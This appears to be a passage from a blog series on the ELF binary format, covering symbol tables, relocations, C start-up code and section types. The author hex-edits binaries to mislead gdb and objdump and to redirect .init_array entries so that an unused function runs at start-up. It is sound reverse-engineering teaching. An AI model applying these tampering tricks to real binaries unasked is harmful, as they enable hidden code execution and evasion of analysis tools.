The ELF64_R_SYM macro is actually for pulling out the symbol that this relocation applies to (I hinted at that in the cheat sheet at the beginning of the section - because I got them foreshadowing skills yo). Here's an example from a random binary I pulled off my machine (notice the Info field in the readelf dump and how it correlates with the symbol indexes):

Some more insight on how this is probably meant to be used internally to the c runtime can be seen in an extract from glibc-2.28_afl/glibc-2.28/elf/do-rel.h:

We know what a C program will most likely use in terms of its own terminology but what does the format actually look like in raw hex?

One can see the extra 8 NULL bytes at the end; this is the r_addend set to 0. Now you know why readelf lists an addend value that is almost always 0.
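If you want to decode such a record by hand, here is a minimal sketch that turns 24 raw little-endian bytes into the three fields. The struct demo_rela is a hypothetical local mirror of Elf64_Rela, and the helper names are assumptions for this example.

```c
#include <stdint.h>

/* Hypothetical local mirror of Elf64_Rela: three 8-byte fields. */
struct demo_rela {
    uint64_t r_offset;  /* where the relocation is applied */
    uint64_t r_info;    /* symbol index and relocation type */
    int64_t  r_addend;  /* constant used in the calculation */
};

/* Read 8 bytes stored least-significant byte first. */
static inline uint64_t demo_read_le64(const unsigned char *p)
{
    uint64_t v = 0;

    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* Decode one 24-byte on-disk record, as it appears in a hexdump. */
static inline struct demo_rela demo_parse_rela(const unsigned char *raw)
{
    struct demo_rela r;

    r.r_offset = demo_read_le64(raw);
    r.r_info   = demo_read_le64(raw + 8);
    r.r_addend = (int64_t)demo_read_le64(raw + 16);
    return r;
}
```

Feeding it the bytes 18 10 60 00 00 00 00 00, 07 00 00 00 01 00 00 00 and eight zero bytes yields r_offset 0x601018, r_info 0x0000000100000007 and an r_addend of 0. Those byte values are made up for the example, not taken from the screenshot.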

I mentioned that the [name] part of the relocation .rel(a).[name] mentioned the purpose of the field so I thought I could cook up an example of this in use. We can look at a large sample of the R_X86_64_JUMP_SLOT entries, I grabbed this from a random binary on my machine (literally used a bash script that takes a list and passes it through shuf lol):

Color choice was on point with this one.

Clearly this section provides some insight on how the JUMP instructions that point to the GOT work. I believe that R_X86_64_JUMP_SLOT entries are specifically for preparing the PLT jump gadgets.

Anyway all these beautiful fairy tales about Elfs make great bed time stories for unquestioning children; but let's see if the format is really treated this way. The next section looks at some of the horrible things that could happen when someone messes with the reloc metadata.

Relocation hex sorcery

Let's see which evil spirits we can summon by flipping some bits in the reloc format for an Elf.

r_info mangling

First off, let's see what happens when we change the r_info field up. Here I have two symbols that have reloc records in the .rela.plt and I'm mangling the r_info field so they point to the same function, namely puts, and then seeing what happens (I'm changing the byte in the r_info field that indicates the symbol pointed to by the reloc record):

In the screenshot I'm trying to show what the picture was before and after editing the relocation metadata. We can see here that gdb actually feels the effect of the reloc because it used it on the symbol for putchar.

What happened here is when gdb tried to resolve the function it made use of the index value we changed. So we made the reloc point to a different index in the symbol table and it used this to resolve its definition resulting in the puts function being targeted instead.

So we've learned that the r_info field is pretty powerful when it comes to driving function identification in some contexts(2). Beyond that we can also look at how malformed r_offset values affect execution.

r_offset mangling

Another thing I can show here is how repointing the r_offset values to the same location affects resolving GOT and PLT stuff. Because we are re-pointing a symbol's relocation record here, it affects how the runtime recognizes that the symbol has already been resolved, and as a result the runtime is invoked every time we use that dynamic symbol in code. This is me editing the r_offsets for puts and putchar to point to the same value:

And this is the result in gdb:

On the right we have the binary that was edited, on the left we have the original. In this gdb session I set a breakpoint on the call in the PLT at 0x400420; this invokes _dl_runtime_resolve, which handles patching and looking up symbols. As you can see by comparing the two, messing with the symbol's r_offset causes the _dl_runtime_resolve call to happen one more time than in the original.

r_type mangling

As for the r_type value (which is defined as a certain bit offset in r_info), I pretty much tried injecting others, but learned that the runtime has consistency checks on the types. There may be many other kinds of reloc sections that allow for arbitrary r_types and all kinds of symbol remapping. If they exist and when I find them I'll dedicate a blog post to them.

For now let's look at how miserably I failed:

As you can see, whatever I try is rejected outright by the runtime, it won't have any of this nonsense lol. Anyway that's it for this one folks, stay tuned for the next post in this series covering some of the internals of dynamic linking and lazy loading ;).

References and Reading

Footnotes:

To expand Lacan's quote here (purely for the Elf Format Philosophiles): Reality is never what we symbolize it to be, it is what always escapes our symbolization. What is left from our inevitable failure to completely symbolize it perfectly absolutely well with out mistakes exactly right clearly - you get it (why are there so many perfected works for perfection itself)? In this post I will essentially show in some ways that symbols can profoundly betray the functions/variables they are meant to point to: this is because even the symbols themselves, must have symbols that point their own meanings! So there seems to be a contingency on symbols having meaning but nothing that cements their right to point to anything as a specific meaning. They are free to point to any meaning or function (he says as he repoints Lacan's philosophy at the Elf world). But in the practical world in which we use them of course: they can, as an aggregated collection of symbols in some way expose a singular function; we can "recognize" that symbols in a certain category can be "summed up" or "replaced for" (in a context-free grammatical sense) more or less by a collective theme. Such themes are symbols too! But if under an already assumed theme, a collection of symbols misses consistency or paradoxes in a certain way with this theme (which it will always inevitably do - because the hosting theme to every theme is reality itself - which always paradoxes) the whole picture is broken; the theme becomes absurdity instead of what it originally hoped to be. In Lacan's case he argued that this is what in some sense defines our access to "the real" reality and that addressing this too directly caused a reflexive denial of how reality works (we cannot accept the realism of complete non-fantasy or the extreme fantasy either). 
In the case of linux executable formats it means we need to get some person to reverse engineer the whole binary to determine what functions do from the ground up - which is maddening in and of its own! lol
This means there must be other things we can do with it, perhaps inject functions into the binary or re-point functions at a key time in their lazy loading life-cycle or force a re-invocation of the run-time in a way that side channels information about the functions being called and therefore data being processed? maybe maybe lol Probably better addressed in a separate post.

Introduction to the ELF Format (Part VI) : The Symbol Table and Relocations (Part 1)

2018-10-10T20:09:00.000-07:00

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html
(Part IV) : Section Types and Special Sections https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html
(Part V) : C Start up https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html
this

In this and the next post I'm going to explore how Elf files manage to pull off the magic of symbol resolution as well as the format, offsets and records in the Elf that represent this information. There are many facets to this mechanism in the format, and before I get into each of them I'd like to provide a gentle intro to frame your thinking around why things work the way they do.

Introduction

Symbolically locating the purpose of relocation

If you are already pretty clued up on why this is important feel free to move on to the next section.

I know you probably want to jump right in and look at all the awesome C definitions and byte offsets but I found that it's much easier to understand how all these obscure offsets and hex values work if you know a little bit of the intention behind them and appreciate the real complexity of the problem being solved. So let's talk about why C programs need relocation and symbol tables.

We know that code can become pretty big and to make things more refactor-able and reusable, we split it up into smaller parts(1). There is a natural need that develops: to be able to break code up into smaller sub-classes/files or general organizational units. In C/C++ these units are referred to as shared libraries, and the Elf file format offers this functionality through Relocation, Symbols and Dynamic Linking. That is to say that the "things" being relocated are symbols, and symbols are for the most part variables and functions of different flavors.

Suffice it to say "relocations" will be found in the Relocation Tables and the symbols these refer to will be found in the ELFs Symbol Tables - I should mention also there is more than one symbol table and more than one relocation table, for nothing else than efficiency and extended capability in configuring symbol resolution.

The object of compiling and linking objects

It also helps to picture what the compiler does to prepare this information. Knowing what the final goal is helps us suffer through the annoyingly complex and obscure steps that lead towards it.

When throwing together different shared libraries and object files, the linker decouples the actions of resolving symbols from linking the files together. So essentially there will be a first "sweep"(2) that slaps the different shared libraries and object files into a contiguous sequence.
That action means that in the final Elf object file, we are simply adding an offset to the original addresses of symbols that displaces them from where they originally appear in their own files.

An even simpler way of thinking about it would be to say it's basically like grabbing a bunch of arrays and sticking them inside another array to build an array of arrays (which is a common action in many languages). I've depicted a minimal link and compile process with gcc commands included and even stuck in the real offsets some of the functions got mapped to:

basic compile and link work flow with gcc. To get myself out of trouble I've included a relocate() fake function here to say "when this gets relocated it produces this address for the objects mapping in the final ELF file"
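In the same spirit as the fake relocate() in the picture, here is a toy sketch of the "array of arrays" idea in C. It assumes the input objects are laid out back to back starting at some output base, with no alignment padding or section merging, which a real linker would of course have to deal with. The name demo_relocate and its parameters are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Toy model of the first linker "sweep": objects are concatenated in
 * order, so a symbol's final address is the output base, plus the sizes
 * of every object placed before its own, plus its original offset. */
static inline uint64_t demo_relocate(uint64_t output_base,
                                     const uint64_t *input_sizes,
                                     size_t object_index,
                                     uint64_t offset_in_object)
{
    uint64_t address = output_base;

    for (size_t i = 0; i < object_index; i++)
        address += input_sizes[i];   /* skip over earlier objects */
    return address + offset_in_object;
}
```

With objects of sizes 0x40, 0x30 and 0x20 placed at base 0x400000, a symbol at offset 0x4 in the third object ends up at 0x400000 + 0x40 + 0x30 + 0x4 = 0x400074. The displacement the linker adds is exactly the thing a relocation record has to describe.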

So this is essentially the work flow of the compiler at a very high level; what should focus your investigation further is what those deeper details and hex obscurities are that achieve this aggregated behavior. Why does this picture appear to work so smoothly? Well it must be hiding its hideous details away!

In closing, what you need to imagine here is that for each attribute there must be some bits and bytes that allow quick determination of the settings for each attribute as well as how it managed to end up in its place in the final Elf object file. In the next section we cover how this format works and what allows it to offer this amazing functionality and we are going to show how horrible it can get when this breaks!

Notes:

(1) This has nothing to do with development and more to do with the burden of processing language as a whole.
(2) (borrowing some terms that foreshadow your journey into the world of compilers should you get crazy enough for that ride)

Symbol Table and friends (.symtab, .dynsym)

So the Elf format needs to find a clever compact way to bundle information so it represents the plethora of things that determine the type and scope/binding of a symbol and what must be done to resolve it as well. The symbol table is meant to show us the symbols we want to relocate.

I should mention that there are two symbol tables namely the main symbol table (.symtab in the section headers) and .dynsym the dynamic symbol table, which is just a smaller subset of the entries in the main symbol table. This is a smaller copy relevant only to the dynamic linker. It follows exactly the same encoding and format as the main one, but I won't discuss it here I'll give a full swing in a later post about dynamic linking instead.

Before we dig into things, here's a cheat sheet showing you the scope and break down of the Symbol Table:

Symbol Table Entry Field Cheat Sheet

The following struct is used in libelf, it should expose some important information about how Symbol Table Entries work (extract from glibc/elf/elf.h:529-536):

typedef struct
{
  Elf64_Word st_name; /* (4 bytes) Symbol name */
  unsigned char st_info; /* (1 byte) Symbol type and binding */
  unsigned char st_other; /* (1 byte) Symbol visibility */
  Elf64_Section st_shndx; /* (2 bytes) Section index */
  Elf64_Addr st_value; /* (8 bytes) Symbol value */
  Elf64_Xword st_size; /* (8 bytes) Symbol size */
} Elf64_Sym;

I've added the type size so you don't need to scratch through the typedefs to figure this out, you're welcome!

So the way I like to think about this is: because of the order and sizes of these fields, we can quickly notice that the first 8 bytes (st_name, st_info, st_other, st_shndx) act like a kind of meta-data header that allows determination of the attributes of the symbol, and everything after that points to the actual value that the symbol holds (its address, offset etc - this depends somewhat on the values in the first 8 bytes).
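That 8-byte header plus 16-byte body split can be sketched as a tiny decoder. The struct demo_sym below is a hypothetical local mirror of Elf64_Sym using fixed-width types, and the helpers (demo_read_le, demo_parse_sym) are names invented for this example; it assumes a little-endian file, as on x86_64.

```c
#include <stdint.h>

/* Hypothetical local mirror of Elf64_Sym (24 bytes on disk). */
struct demo_sym {
    uint32_t      st_name;   /* bytes 0-3: index into the string table */
    unsigned char st_info;   /* byte 4: type and binding */
    unsigned char st_other;  /* byte 5: visibility */
    uint16_t      st_shndx;  /* bytes 6-7: section index */
    uint64_t      st_value;  /* bytes 8-15: symbol value */
    uint64_t      st_size;   /* bytes 16-23: symbol size */
};

/* Read `width` bytes stored least-significant byte first. */
static inline uint64_t demo_read_le(const unsigned char *p, int width)
{
    uint64_t v = 0;

    for (int i = width - 1; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* Decode one 24-byte symbol table entry as seen in a hexdump. */
static inline struct demo_sym demo_parse_sym(const unsigned char *raw)
{
    struct demo_sym s;

    s.st_name  = (uint32_t)demo_read_le(raw, 4);      /* header starts here */
    s.st_info  = raw[4];
    s.st_other = raw[5];
    s.st_shndx = (uint16_t)demo_read_le(raw + 6, 2);  /* header ends at byte 7 */
    s.st_value = demo_read_le(raw + 8, 8);
    s.st_size  = demo_read_le(raw + 16, 8);
    return s;
}
```

Reading a record this way makes the layout obvious: everything needed to classify the symbol sits in bytes 0 to 7, and the two 8-byte words after that carry the value and size.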

Okay so what do these fields mean?

st_name - the index in the .strtab that holds the first byte of the null terminated name of the symbol. Not all symbols have names; when they don't, this field will hold a value of 0.
st_info - Field of bits that determines a few attributes for the symbol. Namely the "scope" and the type of symbol in the c program this is meant to aid relocation for. It will indicate whether it is a function or variable or something else. The way this works is pretty much like every bit field, in true C style, it gets passed through a Macro. This Macro applies bitmasks, shifts to isolate the offsets in the bitfield dedicated to certain attributes. Here's the code for processing this field on 64bit architectures (extract from glibc/elf/elf.h:570-579):

/* How to extract and insert information held in the st_info field. */

#define ELF32_ST_BIND(val) (((unsigned char) (val)) >> 4)
#define ELF32_ST_TYPE(val) ((val) & 0xf)
#define ELF32_ST_INFO(bind, type) (((bind) << 4) + ((type) & 0xf))

/* Both Elf32_Sym and Elf64_Sym use the same one-byte st_info field. */
#define ELF64_ST_BIND(val) ELF32_ST_BIND (val)
#define ELF64_ST_TYPE(val) ELF32_ST_TYPE (val)
#define ELF64_ST_INFO(bind, type) ELF32_ST_INFO ((bind), (type))

st_other - This is a bit field used to determine the visibility of the symbol. An attribute that controls how code is allowed to reference the variable per certain contexts. Here's the macro glibc uses to pull out the visibility value:

/* How to extract and insert information held in the st_other field. */

#define ELF32_ST_VISIBILITY(o) ((o) & 0x03)

/* For ELF64 the definitions are the same. */
#define ELF64_ST_VISIBILITY(o) ELF32_ST_VISIBILITY (o)

Visibility types for symbols include (also available from the diagram above):

STV_DEFAULT 0x00 - which means this is the default visibility rules
STV_INTERNAL 0x01 - Processor specific hidden class
STV_HIDDEN 0x02 - means this symbol is not available for reference in other modules
STV_PROTECTED 0x03 - Documentation refers to this as a protected symbol. I believe the only thing that differs between this and a normal STV_DEFAULT symbols is that it won't be allowed to be overridden when referenced from within its own shared library.

st_shndx Field indicates the section index associated to this symbol. Symbols are associated to sections this way because everything defined as a symbol will probably have an associated section - for instance where would variable values be defined? Probably the .data*-esq sections no? There are a couple of special section numbers that indicate something about the section related to the symbol these can take a couple values, please check out glibc/elf.h:414+ for the range of these values.

st_value - Value of the symbol; this has different interpretations depending on the symbol type:

In executable files and shared objects this field holds the virtual address of the symbol's definition.
For relocatable files this value will for the most part indicate the offset, within the symbol's section, where the symbol is defined.
For symbols whose st_shndx is SHN_COMMON, st_value holds the alignment constraints to apply when the symbol is allocated.

st_size - Size of the symbol; indicates how many bytes will be occupied by what this symbol represents, depending again on symbol type - for the most part either the size of the data for a variable or the size of the code for a function.

Let's take a look at how this information is represented on disk in raw binary:

I've skipped the first record because it's always going to be a null symbol (same goes for the .dynsym). For the symbol highlighted here we can see the following:

st_value of the symbol is set to 0x400238, which means it will appear at this virtual address
st_size is set to 0, which means it won't take up any space in the binary during execution and probably doesn't define a variable.
st_info is set to 0x03, which means the symbol type is SECTION (low nibble 3), i.e. it's a symbol associated with a section, and the bind type is LOCAL (high nibble 0), which means it is only visible within the current object file.
st_other is set to 0x00, which means its visibility will be STV_DEFAULT
st_name is set to 0x000000, which means the symbol has no name of its own (offset 0 in the string table is the empty string)
st_shndx is set to 0x01 which means it is associated to the section defined at index 1 in the section table. If you haven't guessed this is for the .interp section.

I took the first non-null symbol entry and expanded on it but there are always more elaborate examples to draw on, make sure to pop open hexdump and reverse engineer some of these structures yourself ;)

We are not going to cover relocations just yet; I thought the post might get a bit lengthy and bloated. For now we are going to treat the symbols as a piece of meta-data on their own and worry later about how the dynamic linker might make use of them.

That's pretty much it as far as the symbol table goes, let's see if we can pull off some tricks!

Elf Symbol Sorcery

"Signs and symbols rule the world, not words nor laws" - Confucius

So we know that there are some programs that rely on symbol information; these are things like objdump and gdb. What we're going to do is replace a symbol for a function with another one, and then see what objdump and gdb make of this.

So this is me replacing the address of the main method in the symbol table with the one for never_call:

Just in case you're curious, yes the binary does still run completely as intended; never_call() is uhm never called, but something interesting happens when we disassemble main in gdb:

Huh? I ask it to disassemble main and it gives me some code for never_call? I never called for that! (I'm milking this too hard aren't I? hehe). Anyway gdb fell victim to that old symbol magic!

We can also see that if we ask objdump about the main method it doesn't seem to have any code for it. If you run this grep on an unedited never_call.elf it will show the main() method of course; here it only shows the stub code for __libc_start_main, which eventually calls main itself but is a fundamentally different function:

When I was trying out tricks for this one I accidentally replaced _start, so just to confirm that objdump does completely trust the symbol table check out what it says about _start.

Now you might wonder how main still gets called? If in my mistake and the previous example we are replacing the symbol pointers for main, why does the proper main still get called?

Well if you look at the screenshot above you'll see some of the instruction encoding data in the second output column. Look closely at the one at 0x40046d (which reads c7 c7 30 04 40 00). The last four bytes are the little-endian encoding of 0x400430, the address of main that gets loaded into rdi. In other words the address is baked into the code of _start itself as an immediate operand, completely outside of the potentially broken functionality of the symbol table. So it will happily march on calling the real main instead of the redirected one in the symbol table.

Anyway that's it for this post, stay tuned for the next one! I'll extend our discussion on the symbols and include a breakdown of how relocations work.

References and Reading:

Introduction to the ELF Format (Part V) : Understanding C start up .init_array and .fini_array sections

2018-10-06T01:29:00.003-07:00

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html
(Part IV) : Section Types and Special Sections https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html
this

In this post I'm going to cover some aspects of C start up and mess around with the .init_array and .fini_array sections to show how they work.

C Start Up

So something must happen to get your code in the main function running. This process is called the C start up and it essentially involves running all the initialization code, setting up pointers to some important arrays and then branching over to main.

What the _start method needs to do essentially is perform a function call to __libc_start_main which is the function that will actually call main().

Now if you haven't guessed, this means we need a pointer to the main function as an argument to __libc_start_main. It has a couple of other parameters too, here they are:

LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv,
#ifdef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec,
#endif
__typeof (main) init,
void (*fini) (void),
void (*rtld_fini) (void), void *stack_end)

update: I realized that the original version of the post had the wrong function header for start_main, I grabbed this one straight from glibc (https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L129)
For an alternative explanation of this check out http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html (sorry no https :( . . . <-- those are my tears for your unborn TLS packets *sniff sniff* lol).

So what we have here is:

int (*main) - no guessing here, this is a pointer to the main method in the binary.

int argc - the number of arguments passed to the binary from the command line, including the binary's name (we will show this later).
char **argv - the array holding the actual argument strings. It's important to remember that argv is passed to the _start function via the stack.

__typeof (main) init - This is a pointer to the function (__libc_csu_init) that handles calling the initializer or constructor functions. I'm going to call this a constructor function "call handler"[see footnote 1].

void (*fini) (void) - this is the analogous pointer to the function (__libc_csu_fini) that handles calling destructor functions.
void (*rtld_fini) (void) - The destructor function call handler for the dynamic linker; this value is passed to _start via rdx from the loader (we will see this being used soon). I won't get into how the destructor function call handler works too much here, it's really a little off track for this discussion, but when I cover dynamic linking I'll expand on it more ;)
void *stack_end - end of stack marker.

Just to re-iterate, all of these wonderful things must be prepared by _start for the call to __libc_start_main, and we also know that rtld_fini is passed to _start via rdx.

Beyond that, _start is handed a very helpful stack layout that makes argv and argc easy to locate. Let's see how this is done in a real world example.

Reverse Engineering glibc _start

Here's what _start looks like for one of my binaries during execution:

To clarify what is happening in the figure above: I am setting a break point on the _start function and highlighting the instruction that is about to be executed (note the arrow pointing at 0x400455 <+5>, this means gdb is currently sitting on that instruction).

Digging into the assembler here the first instruction is essentially to clear out ebp. After this it passes the pointer to rtld_fini from rdx to r9; this is actually prepping it already for its cozy position for the important __libc_start_main call. It also saves the value from being destroyed when rdx is used later on.

What the screen shot above also confirms is that the rdx register does indeed contain a pointer to the _dl_fini function; this is shown by the x/64ib $rdx command which says: "disassemble 64 instructions starting at the address stored in rdx" (if you're not super clued up on how gdb's memory examining command x/ works feel free to git guuuuuud by reading through the GDB documentation listed in the references). You can of course do this equivalently on r9, it will no doubt at this point in execution show the same value - I'm just picking rdx coz I'm used to dealing with it more. Before we dig into this _dl_fini function[see footnote 1] let's look at the rest of the instructions in the _start code.

The next instruction at 0x400455 <+5> is a pop into rsi, which loads argc. How do we know this? Well we know that the top of the stack holds argc because when the program is entered for the first time and _start gets called (under the ABI I am running - yours might differ) the stack essentially contains argc, argv and envp; we can see this in the following screen dump:

So from this figure we can see the arguments being passed to the binary are "1 2 3 4 5". We can also see that the first entry in argv is the name of the binary itself, which means the length of argv should be 6, as is shown at the first address on the stack at 0x7fffffffddb0. Next on the stack is the start of the actual argv array, and after that we have a null terminator and the start of the envp array.

Back to the _start method. After the first pop off of the stack, rsp points at the start of the argv array, and at instruction <_start+6> we save that to rdx. After this, at the <_start+9> instruction, we use a bit mask to clear the low bits of the stack pointer so that it's properly aligned, and then proceed to prep for the call to __libc_start_main (this is done because the System V x86_64 ABI expects the stack to be 16-byte aligned when a function is called - it also makes all the tools dump nice groupings of stack information).

Once the stack is aligned it pushes rax onto the stack. According to some stuff I've read on this, that push is purely there to preserve memory alignment boundaries as well; the value in rax isn't used and doesn't mean anything.

I've dumped the register values when the call to __libc_start_main happens just to check out what is actually being passed to it:

We are clearly using the System V ABI for x86_64 calling convention here. This is because instead of pushing all parameters onto the stack in a given order, we do the following:

Parameters to functions are passed in the registers rdi, rsi, rdx, rcx, r8, r9, and further values are passed on the stack in reverse order.

- https://wiki.osdev.org/System_V_ABI

And as we see the registers contain the following:

rdi - pointer to first instruction in int (*main) function
rsi - argc value
rdx - argv pointer
rcx - pointer to first instruction in __libc_csu_init - the program's constructor call handler again.
r8 - pointer to __libc_csu_fini
r9 - pointer to rtld_fini, the mysterious dynamic linker destructor call handler.

And in case you don't believe me check out this dank documentation in the glibc library confirming that we reverse engineered this correctly (or that it actually works as the code intends) - coming through strong with the documentation once again [see footnote 1]. The following extract is from

There are some other interesting details to what __libc_start_main does after this, some of which involves deep Elf sorcery like reading past the value of argv to find envp. There are wonderful articles on this on the internet and the code for __libc_start_main is also available. I take it you folks would enjoy the exercise of confirming it works as described.

To summarize __libc_start_main, and bring the .init_array and .fini_array into context, essentially what start_main does is stuff like:

Setup stack guard:

Check that the file descriptors STDIN, STDOUT and STDERR are setup properly:

https://github.com/lattera/glibc/blob/master/csu/check_fds.c#L87

Some other cool stuff and of course eventually makes the call to (*init) which in the context of start_main, means __libc_csu_init. This is the function that as we see in the footnotes actually makes the call to the init functions we define. Here's confirmation of that call chain from gdb:

foo_constructor is obviously our constructor and we can see it indeed does get called first from __libc_csu_init. These constructors are saved in the section marked .init_array and the analogous array for destructors is called .fini_array. The next section covers how they work.

.init_array and .fini_array Sections and hex sorcery

I'd like to get straight into deconstructing how the .init_array and .fini_array sections work. Lets see what they look like in the section header table and annotate all their fields in an honest hexdump:

What we can see here is that the .init_array section points into the ELF file at 0x0e00, which holds two addresses:

0x0e00 (.init_array)

0x400540 (frame_dummy) - not going to dig into this too much, but what I glean about this for now is that this sets up things to be able to do exception handling and reconstructing stack frames to aid debugging and stack forensics. More on this here and here.
0x400440 (foo_constructor) - our constructor!

We also have the .fini_array section at 0x0e10 which holds these entries:

0x0e10 (.fini_array)

0x400520 (__do_global_dtors_aux) - handles destructors when .fini_array is not defined according to this.
0x400430 (foo_destructor) - our destructor!

So we know where to find the pointers to our destructor and constructor functions and we know when they will be called, let's see if we can force the binary to call another function instead.

So if I were to make the .init_array point to the function never_call, which as in the previous example is never called under normal execution, here's what the hexdump would look like:

Win! We can control the flow of execution by redirecting the entries in the .init_array section! This of course works the same way for .fini_array; I'm going to leave that for you folks to figure out if you'd like to.

Thanks for reading this one, more posts on deep Elf sorcery and other wonderful linuxy things coming soon!

References and Recommended Reading

How C Programs get run https://lwn.net/Articles/631631/
System V intel https://software.intel.com/sites/default/files/article/402129/mpx-linux64-abi.pdf
System V ABI https://wiki.osdev.org/System_V_ABI
Examining Memory with GDB https://sourceware.org/gdb/onlinedocs/gdb/Memory.html
https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf
http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html

Footnotes

1 - why _dl_fini should be referred to as the destructor "function call handler" in my opinion

This is since, though some folks refer to this as THE [de/con]-structor function, in reality it is only the standardized function that finds the pointers TO the user defined [de/con]-structor functions. Here's why I say so, extract from https://github.com/lattera/glibc/blob/master/elf/dl-fini.c#L137:

What can I say folks that glibc comment game is solid though. Code speaks for its Elf around here ;)

So I take it, this makes it obvious that the pointer to the _dl_fini function can actually be referred to as more of a destructor "call handler", no? To close my point let's look at dl-init.c for the definition of _dl_init as well:

Pretty much the same thing, it uses some link map type object ( ElfW(Dyn) *preinit_array = main_map->l_info[DT_PREINIT_ARRAY]; ) loaded with the offsets and all the ELF format goodies. It uses this to calculate an offset to the init function array, and then just runs through them calling each with argc, argv and envp.

Anyway, while making that heavily egotistical point we actually traversed some pretty important code in the Elf world, this is the very definition of the _dl_fini function that handles your binary. If you wanna unlock the s e c r e t s you should spend some time digging through that /elf/ directory.

Introduction to The ELF Format (Part IV): Exploring Section Types and Special Sections

2018-10-04T17:54:00.000-07:00

Hi folks, this post is part of a series about the ELF format. So far in this series we have:

ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
ELF Header and Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
ELF Header and Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html

In this post I'm going to go over how some of the sections in the format work in a bit more detail. Previous posts didn't really expand on all the weirdness that each individual section type and format can harbor, especially in how it can break interpretation of the file under normal debugging and reverse engineering efforts. We're going to run through a couple sections here, talk about different section types and see what ELFs can make some of the binutils do if we mess around with the bytes. Hope you folks enjoy!

Section Types

From other posts I've already expanded on the section table header and in that header we have a field called sh_type, which indicates the section type. Each section type is like a model or layout type for a given kind of section and imposes certain attributes to how the bits and bytes are grouped together to mean things in those sections. For instance they might be simple lists or complex nested hash look up tables.

To make this clearer; lets imagine how this aids problem solving in the ELF format. Lets say a compiler, malware or exploit developer needs a section to host a simple list of strings, in this case a section type of SHT_STRTAB would be appropriate. And as we see the .shstrtab and .strtab are exactly those types:

Here's a list of what some of the others are meant to be used for:

SHT_NULL - marks a section header as inactive, with no section data behind it. Documentation refers to this as directly for marking a section as unused, and it will most probably be skipped over by most semantically driven ELF utilities. This is also a field that sometimes avoids reading strings over into other sections. One can imagine many C programmers enjoy scanning until the cows come home OR they hit a null byte - this is the odd reason why such fields are necessary sometimes.
SHT_PROGBITS - This is just a marking for a section that says it could contain anything, and the format is usually dictated by the program being executed essentially. PROGBITS is pretty much for program specific behavior - which could be anything - literally anything even Turing complete anything! These are typically used for marking the sections that contain actual code for execution, the data section, initialization / finalization procedures (or perhaps even wilder concepts specific to the ABI or compiler producing the executable code sections and accompaniments - again this section type doesn't impose much format control really)
SHT_SYMTAB - This marks a section that should have the format of the symbol table - I will of course flesh out how this works later on in the post because it needs its own space, so in a literal way I'm going to use this keyword to mark a section further down in the post :)
SHT_STRTAB - A section that holds a list of null terminated strings.
SHT_HASH - This section is for holding a hash table, usually to speed up looking for symbols. In fact documentation says that if an executable participates in dynamic linking it MUST have one of these sections. I will put that bold brave beautiful claim to the test later on in the post (if not in its own post depending on how exciting this potential lie becomes).

There are tons more section types, I think it's best to refer to the documentation for the full list instead of re-creating it here. Let's take a closer look at how some of these work though.

SHT_STRTAB section types (.shstrtab and friends)

Looking at what a typical SHT_STRTAB is like in a hexdump:

As you can see the strings are nice and neatly delimited by null bytes, super easy to not mess this up when reading in strings in C :))).

In previous posts I mentioned that the .shstrtab holds section names, which means it provides a good starting point for mangling the section attributes in a way that skews their interpretation by debug tools or other ELF interpreters - a key skill in understanding how they work!*

So in this same method; for the first experiment I decided to point the start of the shstrtab down 8 bytes to see what happens to readelf's output about the sections; I get the following results:

Just to make the diagram clearer, what we have here in the top frame is the raw hexdump of the start of the shstrtab. It originally started at 0x18F4 and we shifted it down to start at 0x18FC.

What you should see in this perhaps bloated diagram sketch is that by moving the start of the shstrtab section the strings jump 8 bytes down for each entry. More accurately we can say they all start 8 bytes down, but because they are strings readelf will read bytes in until it hits a null byte. For instance we can see that the first section name, .interp, which was originally at 0x190F, now points to 0x1917. So .interp, usually the first valid section, is now called .note.ABI-tag. The following section name (which also starts 8 bytes down) is then I-tag, since it now starts at 0x191F and reads until it hits the null byte at 0x1924. The rest of the sections follow the same pattern - a good exercise would be to confirm this on your own.

Okay so what happens when we mangle the section types? Lets say we NULL them out, swap section types on some of them and see if the program still runs - and if it doesn't why and how far it manages to get close to running.

Here are the results from NULLing out the section types (recall that marking a section as having a null type in the section header table means it will be "skipped"):

The large white column here marks the column in this ELF that contains the sh_type bytes. I'm really just being lazy with labeling here and leaving identification of the individual section types up to the reader if need be, but once you get in the swing of identifying the section table layout by hand, you'll quickly realize that if this column is null it immediately means a whole bunch of section types are nulled out. The smaller boxes next to this column show some virtual addresses for some of the sections; I highlight them here so you can see quickly that we have indeed written over the records for the sections shown on the right. We can also see in the hexdump that the section header table starts at 0x1a00 (which is the value we usually see for the example binary I'm using, so we can guess that I probably didn't change that; the faults here are caused directly by the sh_type mangling alone). To confirm another way, we can see in the readelf output on the right that all the section types are shown as NULL.

We can also see this does strange things to gdb when it's trying to load some information from those sections and can even break its ability to interpret the file as an executable:

